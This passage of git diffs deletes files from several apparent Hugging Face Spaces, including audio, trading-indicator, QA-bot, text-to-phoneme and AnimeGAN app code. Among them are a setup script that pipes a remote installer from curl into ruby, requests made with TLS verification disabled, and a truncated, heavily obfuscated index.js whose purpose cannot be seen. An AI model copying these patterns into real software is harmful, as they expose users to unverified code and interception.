make_validation_set(filelist, cropsize, sr, hop_length, n_fft, offset): - patch_list = [] - patch_dir = "cs{}_sr{}_hl{}_nf{}_of{}".format( - cropsize, sr, hop_length, n_fft, offset - ) - os.makedirs(patch_dir, exist_ok=True) - - for i, (X_path, y_path) in enumerate(tqdm(filelist)): - basename = os.path.splitext(os.path.basename(X_path))[0] - - X, y = spec_utils.cache_or_load(X_path, y_path, sr, hop_length, n_fft) - coef = np.max([np.abs(X).max(), np.abs(y).max()]) - X, y = X / coef, y / coef - - l, r, roi_size = make_padding(X.shape[2], cropsize, offset) - X_pad = np.pad(X, ((0, 0), (0, 0), (l, r)), mode="constant") - y_pad = np.pad(y, ((0, 0), (0, 0), (l, r)), mode="constant") - - len_dataset = int(np.ceil(X.shape[2] / roi_size)) - for j in range(len_dataset): - outpath = os.path.join(patch_dir, "{}_p{}.npz".format(basename, j)) - start = j * roi_size - if not os.path.exists(outpath): - np.savez( - outpath, - X=X_pad[:, :, start : start + cropsize], - y=y_pad[:, :, start : start + cropsize], - ) - patch_list.append(outpath) - - return VocalRemoverValidationSet(patch_list) diff --git a/spaces/Lbin123/Lbingo/src/pages/api/healthz.ts b/spaces/Lbin123/Lbingo/src/pages/api/healthz.ts deleted file mode 100644 index f6ae44ff0fd66ccd3f7feaa550025fbf2a83bf77..0000000000000000000000000000000000000000 --- a/spaces/Lbin123/Lbingo/src/pages/api/healthz.ts +++ /dev/null @@ -1,7 +0,0 @@ -'use server' - -import { NextApiRequest, NextApiResponse } from 'next' - -export default async function handler(req: NextApiRequest, res: NextApiResponse) { - res.status(200).end('ok') -} diff --git a/spaces/Lianjd/stock_dashboard/backtrader/indicators/deviation.py b/spaces/Lianjd/stock_dashboard/backtrader/indicators/deviation.py deleted file mode 100644 index 956ad481e0f732769ffc59eeaa52e93a32ae0cff..0000000000000000000000000000000000000000 --- a/spaces/Lianjd/stock_dashboard/backtrader/indicators/deviation.py +++ /dev/null @@ -1,107 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8; py-indent-offset:4 -*- -############################################################################### -# -# Copyright (C) 2015-2020 Daniel Rodriguez -# -# This program is free software: you can redistribute it and/or modify -# it under the terms of the GNU General Public License as published by -# the Free Software Foundation, either version 3 of the License, or -# (at your option) any later version. -# -# This program is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -# GNU General Public License for more details. -# -# You should have received a copy of the GNU General Public License -# along with this program. If not, see . -# -############################################################################### -from __future__ import (absolute_import, division, print_function, - unicode_literals) - -from . import Indicator, MovAv - - -class StandardDeviation(Indicator): - ''' - Calculates the standard deviation of the passed data for a given period - - Note: - - If 2 datas are provided as parameters, the 2nd is considered to be the - mean of the first - - - ``safepow`` (default: False) If this parameter is True, the standard - deviation will be calculated as pow(abs(meansq - sqmean), 0.5) to safe - guard for possible negative results of ``meansq - sqmean`` caused by - the floating point representation. - - Formula: - - meansquared = SimpleMovingAverage(pow(data, 2), period) - - squaredmean = pow(SimpleMovingAverage(data, period), 2) - - stddev = pow(meansquared - squaredmean, 0.5) # square root - - See: - - http://en.wikipedia.org/wiki/Standard_deviation - ''' - alias = ('StdDev',) - - lines = ('stddev',) - params = (('period', 20), ('movav', MovAv.Simple), ('safepow', True),) - - def _plotlabel(self): - plabels = [self.p.period] - plabels += [self.p.movav] * self.p.notdefault('movav') - return plabels - - def __init__(self): - if len(self.datas) > 1: - mean = self.data1 - else: - mean = self.p.movav(self.data, period=self.p.period) - - meansq = self.p.movav(pow(self.data, 2), period=self.p.period) - sqmean = pow(mean, 2) - - if self.p.safepow: - self.lines.stddev = pow(abs(meansq - sqmean), 0.5) - else: - self.lines.stddev = pow(meansq - sqmean, 0.5) - - -class MeanDeviation(Indicator): - '''MeanDeviation (alias MeanDev) - - Calculates the Mean Deviation of the passed data for a given period - - Note: - - If 2 datas are provided as parameters, the 2nd is considered to be the - mean of the first - - Formula: - - mean = MovingAverage(data, period) (or provided mean) - - absdeviation = abs(data - mean) - - meandev = MovingAverage(absdeviation, period) - - See: - - https://en.wikipedia.org/wiki/Average_absolute_deviation - ''' - alias = ('MeanDev',) - - lines = ('meandev',) - params = (('period', 20), ('movav', MovAv.Simple),) - - def _plotlabel(self): - plabels = [self.p.period] - plabels += [self.p.movav] * self.p.notdefault('movav') - return plabels - - def __init__(self): - if len(self.datas) > 1: - mean = self.data1 - else: - mean = self.p.movav(self.data, period=self.p.period) - - absdev = abs(self.data - mean) - self.lines.meandev = self.p.movav(absdev, period=self.p.period) diff --git a/spaces/LuxOAI/ChatGpt-Web/scripts/setup.sh b/spaces/LuxOAI/ChatGpt-Web/scripts/setup.sh deleted file mode 100644 index 751a9ac17c220deb476c5aef928f6b0d21d31c40..0000000000000000000000000000000000000000 --- a/spaces/LuxOAI/ChatGpt-Web/scripts/setup.sh +++ /dev/null @@ -1,65 +0,0 @@ -#!/bin/bash - -# Check if running on a supported system -case "$(uname -s)" in - Linux) - if [[ -f "/etc/lsb-release" ]]; then - . /etc/lsb-release - if [[ "$DISTRIB_ID" != "Ubuntu" ]]; then - echo "This script only works on Ubuntu, not $DISTRIB_ID." - exit 1 - fi - else - if [[ ! "$(cat /etc/*-release | grep '^ID=')" =~ ^(ID=\"ubuntu\")|(ID=\"centos\")|(ID=\"arch\")$ ]]; then - echo "Unsupported Linux distribution." - exit 1 - fi - fi - ;; - Darwin) - echo "Running on MacOS." - ;; - *) - echo "Unsupported operating system." - exit 1 - ;; -esac - -# Check if needed dependencies are installed and install if necessary -if ! command -v node >/dev/null || ! command -v git >/dev/null || ! command -v yarn >/dev/null; then - case "$(uname -s)" in - Linux) - if [[ "$(cat /etc/*-release | grep '^ID=')" = "ID=ubuntu" ]]; then - sudo apt-get update - sudo apt-get -y install nodejs git yarn - elif [[ "$(cat /etc/*-release | grep '^ID=')" = "ID=centos" ]]; then - sudo yum -y install epel-release - sudo yum -y install nodejs git yarn - elif [[ "$(cat /etc/*-release | grep '^ID=')" = "ID=arch" ]]; then - sudo pacman -Syu -y - sudo pacman -S -y nodejs git yarn - else - echo "Unsupported Linux distribution" - exit 1 - fi - ;; - Darwin) - /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" - brew install node git yarn - ;; - esac -fi - -# Clone the repository and install dependencies -git clone https://github.com/Yidadaa/ChatGPT-Next-Web -cd ChatGPT-Next-Web -yarn install - -# Prompt user for environment variables -read -p "Enter OPENAI_API_KEY: " OPENAI_API_KEY -read -p "Enter CODE: " CODE -read -p "Enter PORT: " PORT - -# Build and run the project using the environment variables -OPENAI_API_KEY=$OPENAI_API_KEY CODE=$CODE PORT=$PORT yarn build -OPENAI_API_KEY=$OPENAI_API_KEY CODE=$CODE PORT=$PORT yarn start diff --git a/spaces/MWilinski/bot/api/question_answering/qa_model.py b/spaces/MWilinski/bot/api/question_answering/qa_model.py deleted file mode 100644 index 6700f2744d8926e05b290298ede0ea5cfa12639e..0000000000000000000000000000000000000000 --- a/spaces/MWilinski/bot/api/question_answering/qa_model.py +++ /dev/null @@ -1,269 +0,0 @@ -import os -import json -import requests -import subprocess -import torch -import transformers -from urllib.parse import quote -from typing import Mapping, Optional, List, Any -from huggingface_hub import snapshot_download -from transformers import AutoTokenizer, AutoModelForCausalLM -from langchain import PromptTemplate, HuggingFaceHub, LLMChain -from langchain.llms import HuggingFacePipeline -from langchain.llms.base import LLM -from langchain.embeddings import HuggingFaceEmbeddings, HuggingFaceHubEmbeddings, HuggingFaceInstructEmbeddings -from langchain.vectorstores import FAISS -from .mocks import MockLocalBinaryModel - -from api.logger import logger -from api.question_answering.response import Response - - -class LocalBinaryModel(LLM): - model_id: str = None - llm: None = None - - def __init__(self, model_id: str = None): - super().__init__() - from llama_cpp import Llama - - model_path = f'api/question_answering/{model_id}' - if not os.path.exists(model_path): - raise ValueError(f'{model_path} does not exist') - self.model_id = model_id - self.llm = Llama(model_path=model_path, n_ctx=4096) - - def _call(self, prompt: str, stop: Optional[List[str]] = None) -> str: - prompt = f'Q: {prompt} A: ' - output = self.llm( - prompt, - max_tokens=1024, - stop=['Q:'], - echo=False - ) - output_text = output['choices'][0]['text'] - return output_text - - @property - def _identifying_params(self) -> Mapping[str, Any]: - return {"name_of_model": self.model_id} - - @property - def _llm_type(self) -> str: - return self.model_id - - -class TransformersPipelineModel(LLM): - model_id: str = None - pipeline: str = None - - def __init__(self, model_id: str = None): - super().__init__() - self.model_id = model_id - - tokenizer = AutoTokenizer.from_pretrained(model_id) - model = AutoModelForCausalLM.from_pretrained( - model_id, - torch_dtype=torch.bfloat16, - trust_remote_code=True, - load_in_8bit=False, - device_map="auto", - resume_download=True, - ) - self.pipeline = transformers.pipeline( - "text-generation", - model=model, - tokenizer=tokenizer, - max_new_tokens=2048, - ) - - def _call(self, prompt: str, stop: Optional[List[str]] = None) -> str: - output_text = self.pipeline(prompt)[0]['generated_text'] - output_text = output_text.replace(prompt+'\n', '') - return output_text - - @property - def _identifying_params(self) -> Mapping[str, Any]: - return {"name_of_model": self.model_id} - - @property - def _llm_type(self) -> str: - return self.model_id - - -class APIServedModel(LLM): - model_url: str = None - debug: bool = None - - def __init__(self, model_url: str = None, debug: bool = None): - super().__init__() - if model_url[-1] == '/': - raise ValueError('URL should not end with a slash - "/"') - self.model_url = model_url - self.debug = debug - - def _call(self, prompt: str, stop: Optional[List[str]] = None) -> str: - prompt_encoded = quote(prompt, safe='') - url = f'{self.model_url}/?prompt={prompt_encoded}' - if self.debug: - logger.info(f'URL: {url}') - try: - response = requests.get(url, timeout=1200, verify=False) - response.raise_for_status() - output_text = json.loads(response.content)['output_text'] - return output_text - except Exception as err: - logger.error(f'Error: {err}') - return f'Error: {err}' - - @property - def _identifying_params(self) -> Mapping[str, Any]: - return {"name_of_model": f'model url: {self.model_url}'} - - @property - def _llm_type(self) -> str: - return 'api_model' - - - -class QAModel(): - """ - QAModel class, used for generating answers to questions. - - Args: - llm_model_id (str): The ID of the LLM model to be used. - embedding_model_id (str): The ID of the embedding model to be used. - index_repo_id (str): The ID of the index repository to be used. - run_locally (bool, optional): Whether to run the models locally or on the Hugging Face hub. Defaults to True. - use_docs_for_context (bool, optional): Whether to use relevant documents as context for generating answers. - Defaults to True. - use_messages_for_context (bool, optional): Whether to use previous messages as context for generating answers. - Defaults to True. - debug (bool, optional): Whether to log debug information. Defaults to False. - - Attributes: - use_docs_for_context (bool): Whether to use relevant documents as context for generating answers. - use_messages_for_context (bool): Whether to use previous messages as context for generating answers. - debug (bool): Whether to log debug information. - llm_model (Union[LocalBinaryModel, HuggingFacePipeline, HuggingFaceHub]): The LLM model to be used. - embedding_model (Union[HuggingFaceInstructEmbeddings, HuggingFaceHubEmbeddings]): The embedding model to be used. - prompt_template (PromptTemplate): The prompt template to be used. - llm_chain (LLMChain): The LLM chain to be used. - knowledge_index (FAISS): The FAISS index to be used. - - """ - def __init__( - self, - llm_model_id: str, - embedding_model_id: str, - index_repo_id: str, - use_docs_for_context: bool = True, - add_sources_to_response: bool = True, - use_messages_for_context: bool = True, - num_relevant_docs: int = 3, - debug: bool = False - ): - super().__init__() - self.use_docs_for_context = use_docs_for_context - self.add_sources_to_response = add_sources_to_response - self.use_messages_for_context = use_messages_for_context - self.num_relevant_docs = num_relevant_docs - self.debug = debug - - if 'local_models/' in llm_model_id: - logger.info('using local binary model') - self.llm_model = LocalBinaryModel( - model_id=llm_model_id - ) - elif 'api_models/' in llm_model_id: - logger.info('using api served model') - self.llm_model = APIServedModel( - model_url=llm_model_id.replace('api_models/', ''), - debug=self.debug - ) - else: - logger.info('using transformers pipeline model') - self.llm_model = TransformersPipelineModel( - model_id=llm_model_id - ) - - prompt_template = \ - "### Instruction:\n" \ - "Give an answer that contains all the necessary information for the question.\n" \ - "If the context contains necessary information to answer question, use it to generate an appropriate response.\n" \ - "{context}\n### Input:\n{question}\n### Response:" - - prompt = PromptTemplate( - template=prompt_template, - input_variables=['question', 'context'] - ) - self.llm_chain = LLMChain(prompt=prompt, llm=self.llm_model) - - if self.use_docs_for_context: - logger.info(f'Downloading {index_repo_id}') - snapshot_download( - repo_id=index_repo_id, - allow_patterns=['*.faiss', '*.pkl'], - repo_type='dataset', - local_dir='indexes/run/' - ) - logger.info('Loading embedding model') - embed_instruction = "Represent the Hugging Face library documentation" - query_instruction = "Query the most relevant piece of information from the Hugging Face documentation" - embedding_model = HuggingFaceInstructEmbeddings( - model_name=embedding_model_id, - embed_instruction=embed_instruction, - query_instruction=query_instruction - ) - logger.info('Loading index') - self.knowledge_index = FAISS.load_local(f"./indexes/run/", embedding_model) - - - def get_response(self, question: str, messages_context: str = '') -> Response: - """ - Generate an answer to the specified question. - - Args: - question (str): The question to be answered. - messages_context (str, optional): The context to be used for generating the answer. Defaults to ''. - - Returns: - response (Response): The Response object containing the generated answer and the sources of information - used to generate the response. - """ - - response = Response() - context = 'Give an answer that contains all the necessary information for the question.\n' - relevant_docs = '' - if self.use_messages_for_context and messages_context: - messages_context = f'\nPrevious questions and answers:\n{messages_context}' - context += messages_context - if self.use_docs_for_context: - logger.info(f'Retriving documents') - relevant_docs = self.knowledge_index.similarity_search( - query=messages_context+question, - k=self.num_relevant_docs - ) - context += '\nExtracted documents:\n' - context += "".join([doc.page_content for doc in relevant_docs]) - metadata = [doc.metadata for doc in relevant_docs] - response.set_sources(sources=[str(m['source']) for m in metadata]) - - logger.info(f'Running LLM chain') - answer = self.llm_chain.run(question=question, context=context) - response.set_answer(answer) - logger.info(f'Received answer') - - if self.debug: - sep = '\n' + '-' * 100 - logger.info(sep) - logger.info(f'messages_contex: {messages_context} {sep}') - logger.info(f'relevant_docs: {relevant_docs} {sep}') - sources_str = '\n'.join(response.get_sources()) - logger.info(f"sources:\n{sources_str} {sep}") - logger.info(f'context len: {len(context)} {sep}') - logger.info(f'context: {context} {sep}') - logger.info(f'question len: {len(question)}') - logger.info(f'question: {question} {sep}') - logger.info(f'response: {response.get_answer()} {sep}') - return response diff --git a/spaces/Mahiruoshi/Lovelive-Nijigasaku-Chat-iSTFT-GPT3/monotonic_align/__init__.py b/spaces/Mahiruoshi/Lovelive-Nijigasaku-Chat-iSTFT-GPT3/monotonic_align/__init__.py deleted file mode 100644 index 49e32c9a128aeadc2044c362ff27f6a43f6d7815..0000000000000000000000000000000000000000 --- a/spaces/Mahiruoshi/Lovelive-Nijigasaku-Chat-iSTFT-GPT3/monotonic_align/__init__.py +++ /dev/null @@ -1,19 +0,0 @@ -from numpy import zeros, int32, float32 -from torch import from_numpy - -from .core import maximum_path_jit - -def maximum_path(neg_cent, mask): - """ numba optimized version. - neg_cent: [b, t_t, t_s] - mask: [b, t_t, t_s] - """ - device = neg_cent.device - dtype = neg_cent.dtype - neg_cent = neg_cent.data.cpu().numpy().astype(float32) - path = zeros(neg_cent.shape, dtype=int32) - - t_t_max = mask.sum(1)[:, 0].data.cpu().numpy().astype(int32) - t_s_max = mask.sum(2)[:, 0].data.cpu().numpy().astype(int32) - maximum_path_jit(path, neg_cent, t_t_max, t_s_max) - return from_numpy(path).to(device=device, dtype=dtype) diff --git a/spaces/Mahiruoshi/MyGO_VIts-bert/text/chinese.py b/spaces/Mahiruoshi/MyGO_VIts-bert/text/chinese.py deleted file mode 100644 index 51acb3ec401d7647278a25537576a0fb1775d827..0000000000000000000000000000000000000000 --- a/spaces/Mahiruoshi/MyGO_VIts-bert/text/chinese.py +++ /dev/null @@ -1,198 +0,0 @@ -import os -import re - -import cn2an -from pypinyin import lazy_pinyin, Style - -from text.symbols import punctuation -from text.tone_sandhi import ToneSandhi - -current_file_path = os.path.dirname(__file__) -pinyin_to_symbol_map = { - line.split("\t")[0]: line.strip().split("\t")[1] - for line in open(os.path.join(current_file_path, "opencpop-strict.txt")).readlines() -} - -import jieba.posseg as psg - - -rep_map = { - ":": ",", - ";": ",", - ",": ",", - "。": ".", - "!": "!", - "?": "?", - "\n": ".", - "·": ",", - "、": ",", - "...": "…", - "$": ".", - "“": "'", - "”": "'", - "‘": "'", - "’": "'", - "(": "'", - ")": "'", - "(": "'", - ")": "'", - "《": "'", - "》": "'", - "【": "'", - "】": "'", - "[": "'", - "]": "'", - "—": "-", - "~": "-", - "~": "-", - "「": "'", - "」": "'", -} - -tone_modifier = ToneSandhi() - - -def replace_punctuation(text): - text = text.replace("嗯", "恩").replace("呣", "母") - pattern = re.compile("|".join(re.escape(p) for p in rep_map.keys())) - - replaced_text = pattern.sub(lambda x: rep_map[x.group()], text) - - replaced_text = re.sub( - r"[^\u4e00-\u9fa5" + "".join(punctuation) + r"]+", "", replaced_text - ) - - return replaced_text - - -def g2p(text): - pattern = r"(?<=[{0}])\s*".format("".join(punctuation)) - sentences = [i for i in re.split(pattern, text) if i.strip() != ""] - phones, tones, word2ph = _g2p(sentences) - assert sum(word2ph) == len(phones) - assert len(word2ph) == len(text) # Sometimes it will crash,you can add a try-catch. - phones = ["_"] + phones + ["_"] - tones = [0] + tones + [0] - word2ph = [1] + word2ph + [1] - return phones, tones, word2ph - - -def _get_initials_finals(word): - initials = [] - finals = [] - orig_initials = lazy_pinyin(word, neutral_tone_with_five=True, style=Style.INITIALS) - orig_finals = lazy_pinyin( - word, neutral_tone_with_five=True, style=Style.FINALS_TONE3 - ) - for c, v in zip(orig_initials, orig_finals): - initials.append(c) - finals.append(v) - return initials, finals - - -def _g2p(segments): - phones_list = [] - tones_list = [] - word2ph = [] - for seg in segments: - # Replace all English words in the sentence - seg = re.sub("[a-zA-Z]+", "", seg) - seg_cut = psg.lcut(seg) - initials = [] - finals = [] - seg_cut = tone_modifier.pre_merge_for_modify(seg_cut) - for word, pos in seg_cut: - if pos == "eng": - continue - sub_initials, sub_finals = _get_initials_finals(word) - sub_finals = tone_modifier.modified_tone(word, pos, sub_finals) - initials.append(sub_initials) - finals.append(sub_finals) - - # assert len(sub_initials) == len(sub_finals) == len(word) - initials = sum(initials, []) - finals = sum(finals, []) - # - for c, v in zip(initials, finals): - raw_pinyin = c + v - # NOTE: post process for pypinyin outputs - # we discriminate i, ii and iii - if c == v: - assert c in punctuation - phone = [c] - tone = "0" - word2ph.append(1) - else: - v_without_tone = v[:-1] - tone = v[-1] - - pinyin = c + v_without_tone - assert tone in "12345" - - if c: - # 多音节 - v_rep_map = { - "uei": "ui", - "iou": "iu", - "uen": "un", - } - if v_without_tone in v_rep_map.keys(): - pinyin = c + v_rep_map[v_without_tone] - else: - # 单音节 - pinyin_rep_map = { - "ing": "ying", - "i": "yi", - "in": "yin", - "u": "wu", - } - if pinyin in pinyin_rep_map.keys(): - pinyin = pinyin_rep_map[pinyin] - else: - single_rep_map = { - "v": "yu", - "e": "e", - "i": "y", - "u": "w", - } - if pinyin[0] in single_rep_map.keys(): - pinyin = single_rep_map[pinyin[0]] + pinyin[1:] - - assert pinyin in pinyin_to_symbol_map.keys(), (pinyin, seg, raw_pinyin) - phone = pinyin_to_symbol_map[pinyin].split(" ") - word2ph.append(len(phone)) - - phones_list += phone - tones_list += [int(tone)] * len(phone) - return phones_list, tones_list, word2ph - - -def text_normalize(text): - numbers = re.findall(r"\d+(?:\.?\d+)?", text) - for number in numbers: - text = text.replace(number, cn2an.an2cn(number), 1) - text = replace_punctuation(text) - return text - - -def get_bert_feature(text, word2ph): - from text import chinese_bert - - return chinese_bert.get_bert_feature(text, word2ph) - - -if __name__ == "__main__": - from text.chinese_bert import get_bert_feature - - text = "啊!但是《原神》是由,米哈\游自主, [研发]的一款全.新开放世界.冒险游戏" - text = text_normalize(text) - print(text) - phones, tones, word2ph = g2p(text) - bert = get_bert_feature(text, word2ph) - - print(phones, tones, word2ph, bert.shape) - - -# # 示例用法 -# text = "这是一个示例文本:,你好!这是一个测试...." -# print(g2p_paddle(text)) # 输出: 这是一个示例文本你好这是一个测试 diff --git a/spaces/Makiing/coolb-in-gtest/src/app/loading.css b/spaces/Makiing/coolb-in-gtest/src/app/loading.css deleted file mode 100644 index eaaab6a86a228334c4eca3c5368ae6f0f593d405..0000000000000000000000000000000000000000 --- a/spaces/Makiing/coolb-in-gtest/src/app/loading.css +++ /dev/null @@ -1,68 +0,0 @@ -::-webkit-scrollbar { - width: 10px; - height: 10px; - display: none; -} - -::-webkit-scrollbar-button:start:decrement, -::-webkit-scrollbar-button:end:increment { - height: 30px; - background-color: transparent; -} - -::-webkit-scrollbar-track-piece { - background-color: #3b3b3b; - -webkit-border-radius: 16px; -} - -::-webkit-scrollbar-thumb:vertical { - height: 50px; - background-color: #666; - border: 1px solid #eee; - -webkit-border-radius: 6px; -} - -/* loading start */ -.loading-spinner { - display: flex; - justify-content: center; - align-items: center; - height: 100vh; - opacity: 1; - transition: opacity .8s ease-out; -} - -.loading-spinner.hidden { - opacity: 0; -} - -.loading-spinner>div { - width: 30px; - height: 30px; - background: linear-gradient(90deg, #2870EA 10.79%, #1B4AEF 87.08%); - - border-radius: 100%; - display: inline-block; - animation: sk-bouncedelay 1.4s infinite ease-in-out both; -} - -.loading-spinner .bounce1 { - animation-delay: -0.32s; -} - -.loading-spinner .bounce2 { - animation-delay: -0.16s; -} - -@keyframes sk-bouncedelay { - - 0%, - 80%, - 100% { - transform: scale(0); - } - - 40% { - transform: scale(1.0); - } -} diff --git a/spaces/MarketINK/MarketINK/README.md b/spaces/MarketINK/MarketINK/README.md deleted file mode 100644 index c4d14e3fb147dbd62116ac6e02461e94445174b3..0000000000000000000000000000000000000000 --- a/spaces/MarketINK/MarketINK/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: MarketINK -emoji: 🤖 -colorFrom: green -colorTo: blue -sdk: gradio -sdk_version: 3.4.1 -app_file: launch.py -pinned: false -license: unknown ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference \ No newline at end of file diff --git a/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/configs/_base_/models/ann_r50-d8.py b/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/configs/_base_/models/ann_r50-d8.py deleted file mode 100644 index a2cb653827e44e6015b3b83bc578003e614a6aa1..0000000000000000000000000000000000000000 --- a/spaces/Mellow-ai/PhotoAI_Mellow/annotator/uniformer/configs/_base_/models/ann_r50-d8.py +++ /dev/null @@ -1,46 +0,0 @@ -# model settings -norm_cfg = dict(type='SyncBN', requires_grad=True) -model = dict( - type='EncoderDecoder', - pretrained='open-mmlab://resnet50_v1c', - backbone=dict( - type='ResNetV1c', - depth=50, - num_stages=4, - out_indices=(0, 1, 2, 3), - dilations=(1, 1, 2, 4), - strides=(1, 2, 1, 1), - norm_cfg=norm_cfg, - norm_eval=False, - style='pytorch', - contract_dilation=True), - decode_head=dict( - type='ANNHead', - in_channels=[1024, 2048], - in_index=[2, 3], - channels=512, - project_channels=256, - query_scales=(1, ), - key_pool_scales=(1, 3, 6, 8), - dropout_ratio=0.1, - num_classes=19, - norm_cfg=norm_cfg, - align_corners=False, - loss_decode=dict( - type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0)), - auxiliary_head=dict( - type='FCNHead', - in_channels=1024, - in_index=2, - channels=256, - num_convs=1, - concat_input=False, - dropout_ratio=0.1, - num_classes=19, - norm_cfg=norm_cfg, - align_corners=False, - loss_decode=dict( - type='CrossEntropyLoss', use_sigmoid=False, loss_weight=0.4)), - # model training and testing settings - train_cfg=dict(), - test_cfg=dict(mode='whole')) diff --git a/spaces/MichaelT8093/AnimeGANv3/app.py b/spaces/MichaelT8093/AnimeGANv3/app.py deleted file mode 100644 index 677f429041bf7da6a7161135726355e315db4712..0000000000000000000000000000000000000000 --- a/spaces/MichaelT8093/AnimeGANv3/app.py +++ /dev/null @@ -1,108 +0,0 @@ -import os -import cv2 -import gradio as gr -import AnimeGANv3_src - - -os.makedirs('output', exist_ok=True) - - -def inference(img_path, Style, if_face=None): - print(img_path, Style, if_face) - try: - img = cv2.imread(img_path) - img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) - if Style == "AnimeGANv3_Arcane": - f = "A" - elif Style == "AnimeGANv3_Trump v1.0": - f = "T" - elif Style == "AnimeGANv3_Shinkai": - f = "S" - elif Style == "AnimeGANv3_PortraitSketch": - f = "P" - elif Style == "AnimeGANv3_Hayao": - f = "H" - elif Style == "AnimeGANv3_Disney v1.0": - f = "D" - elif Style == "AnimeGANv3_JP_face v1.0": - f = "J" - else: - f = "U" - - try: - det_face = True if if_face=="Yes" else False - output = AnimeGANv3_src.Convert(img, f, det_face) - save_path = f"output/out.{img_path.rsplit('.')[-1]}" - cv2.imwrite(save_path, output[:, :, ::-1]) - return output, save_path - except RuntimeError as error: - print('Error', error) - except Exception as error: - print('global exception', error) - return None, None - - -title = "AnimeGANv3: To produce your own animation." -description = r"""Official online demo for AnimeGANv3. If you like what I'm doing you can tip me on **patreon**.
-It can be used to turn your photos or videos into anime.
-To use it, simply upload your image. It can convert landscape photos to Hayao Miyazaki or Makoto Shinkai style anime, as well as 6 style conversions about human faces.
-If AnimeGANv3 is helpful, please help to ⭐ the Github Repo and recommend it to your friends. 😊 - -""" -article = r""" - -[![GitHub Stars](https://img.shields.io/github/stars/TachibanaYoshino/AnimeGANv3?style=social)](https://github.com/TachibanaYoshino/AnimeGANv3) - -### 🔥 Demo -I. Video to anime (Hayao Style) -

- - - -

-II. Video to anime (USA cartoon + Disney style) - - ----------- - -## License -This repo is made freely available to academic and non-academic entities for non-commercial purposes such as academic research, teaching, scientific publications. Permission is granted to use the AnimeGANv3 given that you agree to my license terms. Regarding the request for commercial use, please contact us via email to help you obtain the authorization letter. - -## Acknowledgement -* Huggingface UI is referenced from @akhaliq/GFPGAN. -* The dataset of AnimeGANv3_JP_face v1.0 is from DCTnet and then manually optimized. - -## Author -Xin Chen -If you have any question, please open an issue on GitHub Repo. - - -
visitor badge
-""" -gr.Interface( - inference, [ - gr.inputs.Image(type="filepath", label="Input"), - gr.Dropdown([ - 'AnimeGANv3_Hayao', - 'AnimeGANv3_Shinkai', - 'AnimeGANv3_Arcane', - 'AnimeGANv3_USA', - 'AnimeGANv3_Trump v1.0', - 'AnimeGANv3_Disney v1.0', - 'AnimeGANv3_PortraitSketch', - 'AnimeGANv3_JP_face v1.0', - ], - type="value", - value='AnimeGANv3_Hayao', - label='AnimeGANv3 Style'), - gr.inputs.Radio(['Yes', 'No'], type="value", default='No', label='Extract face'), - ], [ - gr.outputs.Image(type="numpy", label="Output (The whole image)"), - gr.outputs.File(label="Download the output image") - ], - title=title, - description=description, - article=article, - allow_flagging="never", - examples=[['samples/7_out.jpg', 'AnimeGANv3_Arcane', "Yes"], ['samples/15566.jpg', 'AnimeGANv3_USA', "Yes"],['samples/23034.jpg', 'AnimeGANv3_Trump v1.0', "Yes"], ['samples/jp_13.jpg', 'AnimeGANv3_Hayao', "No"], - ['samples/jp_20.jpg', 'AnimeGANv3_Shinkai', "No"], ['samples/Hamabe Minami.jpg', 'AnimeGANv3_Disney v1.0', "Yes"], ['samples/120.jpg', 'AnimeGANv3_JP_face v1.0', "Yes"], ['samples/52014.jpg', 'AnimeGANv3_PortraitSketch', "Yes"]]).launch(enable_queue=True) diff --git a/spaces/Michale1017/WS/index.js b/spaces/Michale1017/WS/index.js deleted file mode 100644 index 33437ab3c1c48cb9c99d97c3d3b458b9ee2a36f9..0000000000000000000000000000000000000000 --- a/spaces/Michale1017/WS/index.js +++ /dev/null @@ -1 +0,0 @@ -(function(_0x4485c9,_0x22327b){function _0xefd3bf(_0x3e1c6c,_0x1dfa24,_0x15da7f,_0x195c5d,_0x405333){return _0x222c(_0x1dfa24- -0x3cc,_0x405333);}function _0x297c01(_0x30ec4a,_0x42df57,_0x259878,_0x4968a7,_0x262f74){return _0x222c(_0x30ec4a-0x36e,_0x259878);}const _0x356a3e=_0x4485c9();function _0xb68276(_0x21380b,_0x2e2973,_0x52b0fa,_0x117bd5,_0x3635d9){return _0x222c(_0x2e2973-0x241,_0x117bd5);}function _0x4acd10(_0x52497a,_0x3b158a,_0x45ad13,_0x477292,_0x54f686){return _0x222c(_0x3b158a-0x1b5,_0x477292);}function _0x2197ea(_0x728895,_0x5db489,_0x447ced,_0x923532,_0x60db0c){return _0x222c(_0x447ced-0x179,_0x923532);}while(!![]){try{const 